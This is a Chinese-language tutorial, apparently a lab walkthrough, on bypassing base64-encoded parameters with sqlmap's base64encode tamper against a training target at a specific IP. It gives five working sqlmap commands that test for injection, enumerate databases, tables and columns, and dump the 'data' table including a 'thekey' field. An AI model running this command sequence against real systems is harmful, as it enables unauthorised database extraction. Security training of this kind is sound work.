SQL注入实战————2、SQLmap中的temper使用

SQLmap——tamper注入

靶机地址:http://219.153.49.228:42272/show.php?id=MQ==

首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密

SQL注入实战————2、SQLmap中的temper使用_第1张图片

发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面使用sqlmap的tamper来实现注入

1、判断是否可以注入

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode

SQL注入实战————2、SQLmap中的temper使用_第2张图片

SQL注入实战————2、SQLmap中的temper使用_第3张图片

2、爆数据库

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode --dbs
SQL注入实战————2、SQLmap中的temper使用_第4张图片

SQL注入实战————2、SQLmap中的temper使用_第5张图片

3、爆表名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test --tables

SQL注入实战————2、SQLmap中的temper使用_第6张图片

SQL注入实战————2、SQLmap中的temper使用_第7张图片

4、爆字段名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data --columns

SQL注入实战————2、SQLmap中的temper使用_第8张图片

SQL注入实战————2、SQLmap中的temper使用_第9张图片

5、爆字段值

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data -C id,main,thekey,title --dump

SQL注入实战————2、SQLmap中的temper使用_第10张图片

SQL注入实战————2、SQLmap中的temper使用_第11张图片

至此该演示结束,对于其他的tamper的使用方法也是这样,不再多说,有兴趣的可以去差寻一下tamper的各个脚本对应的信息内容!


你可能感兴趣的:(【信息安全】,【高级专题】,———SQL注入)